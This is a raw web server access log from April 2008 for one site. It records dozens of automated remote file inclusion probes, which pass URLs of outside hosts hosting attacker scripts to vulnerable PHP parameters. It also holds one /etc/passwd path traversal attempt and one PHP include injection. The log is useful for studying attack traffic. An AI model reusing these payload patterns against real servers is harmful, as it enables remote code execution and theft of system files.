72.29.95.45 - - [29/Apr/2008:09:09:19 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.122.239 - - [29/Apr/2008:09:09:28 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
72.232.122.239 - - [29/Apr/2008:09:09:28 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:09:09:48 -0700] "GET /main.php?site=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:09:54 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.93.56.80 - - [29/Apr/2008:09:09:57 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://kukekaw.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:10:17 -0700] "GET /test.php?page=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:10:17 -0700] "GET /logs/test.php?page=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.219.159.57 - - [29/Apr/2008:09:11:09 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.156.59 - - [29/Apr/2008:09:11:16 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
222.122.156.59 - - [29/Apr/2008:09:11:16 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:11:31 -0700] "GET /logs/access_080211.log/test.php?page=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:12:12 -0700] "GET /logs/access_080223.log/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:12:12 -0700] "GET /errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:12:12 -0700] "GET /logs/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.122.239 - - [29/Apr/2008:09:12:17 -0700] "GET /logs//webeditor.php?id=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
72.232.122.239 - - [29/Apr/2008:09:12:17 -0700] "GET //webeditor.php?id=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:12:35 -0700] "GET /logs/access_080228.log/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:12:36 -0700] "GET /errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:12:36 -0700] "GET /logs/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.189.166.26 - - [29/Apr/2008:09:12:49 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://togot.us/mini.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.189.166.26 - - [29/Apr/2008:09:12:50 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://togot.us/mini.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.189.166.26 - - [29/Apr/2008:09:13:16 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://togot.us/mini.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:13:31 -0700] "GET /logs/access_080117.log/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.110.147.194 - - [29/Apr/2008:09:13:51 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://druidsutterance.net/templates/rt_technopia/css/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [29/Apr/2008:09:13:52 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://druidsutterance.net/templates/rt_technopia/css/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:13:52 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:13:56 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:13:57 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.805" "www.dmulk.com"
196.7.147.171 - - [29/Apr/2008:09:14:35 -0700] "GET /logs/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.0" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
196.7.147.171 - - [29/Apr/2008:09:14:38 -0700] "GET /index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.0" 200 11590 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:09:14:39 -0700] "GET /logs//main.php?sayfa=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:09:14:40 -0700] "GET //main.php?sayfa=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:14:43 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:14:49 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:14:49 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.79" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:09:14:59 -0700] "GET /logs/index1.php?dat=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:09:15:00 -0700] "GET /index1.php?dat=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:09:15:03 -0700] "GET /logs/access_080214.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:09:15:03 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:09:15:04 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.126.129.119 - - [29/Apr/2008:09:15:14 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
76.126.129.119 - - [29/Apr/2008:09:15:14 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
70.86.49.98 - - [29/Apr/2008:09:15:17 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
70.86.49.98 - - [29/Apr/2008:09:15:17 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
76.126.129.119 - - [29/Apr/2008:09:15:18 -0700] "GET / HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:09:15:21 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.126.129.119 - - [29/Apr/2008:09:15:23 -0700] "GET / HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
222.122.156.59 - - [29/Apr/2008:09:15:25 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
222.122.156.59 - - [29/Apr/2008:09:15:25 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
87.106.39.89 - - [29/Apr/2008:09:15:30 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.39.89 - - [29/Apr/2008:09:15:30 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.207.204.13 - - [29/Apr/2008:09:15:32 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
64.207.204.13 - - [29/Apr/2008:09:15:33 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
220.80.107.90 - - [29/Apr/2008:09:15:47 -0700] "GET //index.php?seccion=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [29/Apr/2008:09:16:47 -0700] "GET /logs/access.log/main.php?page=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.190.166.35 - - [29/Apr/2008:09:16:53 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:16:54 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:16:57 -0700] "GET //index.php?option=com_custompages&cpage=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.182.247 - - [29/Apr/2008:09:16:57 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
84.19.182.247 - - [29/Apr/2008:09:16:57 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:16:58 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.110.147.194 - - [29/Apr/2008:09:17:04 -0700] "GET /logs/access_080215.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://druidsutterance.net/templates/rt_technopia/css/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.111.176.28 - - [29/Apr/2008:09:17:32 -0700] "GET /zoodvd//index.php?option=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:17:56 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:18:00 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 200 4139 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.249.155.6 - - [29/Apr/2008:09:18:04 -0700] "GET /logs/access.log/index.php?lang=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.6.34 - - [29/Apr/2008:09:18:10 -0700] "GET /////////?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
200.249.155.6 - - [29/Apr/2008:09:18:12 -0700] "GET /logs/index.php?lang=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.249.155.6 - - [29/Apr/2008:09:18:13 -0700] "GET /index.php?lang=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
195.14.1.101 - - [29/Apr/2008:09:18:15 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
195.14.1.101 - - [29/Apr/2008:09:18:15 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:09:19:03 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:09:19:03 -0700] "GET //Neos_Chronos/header.php?base_folder=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [29/Apr/2008:09:19:21 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [29/Apr/2008:09:19:21 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:09:19:21 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://eurotandem2008.free.fr/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:09:19:21 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://eurotandem2008.free.fr/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:09:19:22 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://eurotandem2008.free.fr/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:09:19:23 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://eurotandem2008.free.fr/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:09:19:23 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://eurotandem2008.free.fr/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:09:19:27 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://eurotandem2008.free.fr/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:09:19:27 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://eurotandem2008.free.fr/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:09:19:27 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://eurotandem2008.free.fr/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:09:19:27 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://eurotandem2008.free.fr/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:19:32 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:19:35 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:19:36 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [29/Apr/2008:09:19:36 -0700] "GET /logs/access_080130.log/////////?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
74.55.6.34 - - [29/Apr/2008:09:19:37 -0700] "GET /logs/////////?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 200 45280 "-" "libwww-perl/5.810" "dmulk.com"
74.55.6.34 - - [29/Apr/2008:09:19:41 -0700] "GET /////////?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 200 11602 "-" "libwww-perl/5.810" "dmulk.com"
80.153.20.230 - - [29/Apr/2008:09:19:45 -0700] "GET /logs/access_080218.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:20:22 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:20:26 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:20:27 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:09:21:07 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:21:07 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:09:21:07 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:21:07 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:09:21:07 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:21:07 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:21:15 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:21:16 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:21:16 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:09:21:39 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://eurotandem2008.free.fr/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:09:21:39 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://eurotandem2008.free.fr/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:09:21:39 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://eurotandem2008.free.fr/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:21:43 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:21:47 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:21:47 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:21:49 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:09:22:05 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.19.130 - - [29/Apr/2008:09:22:16 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
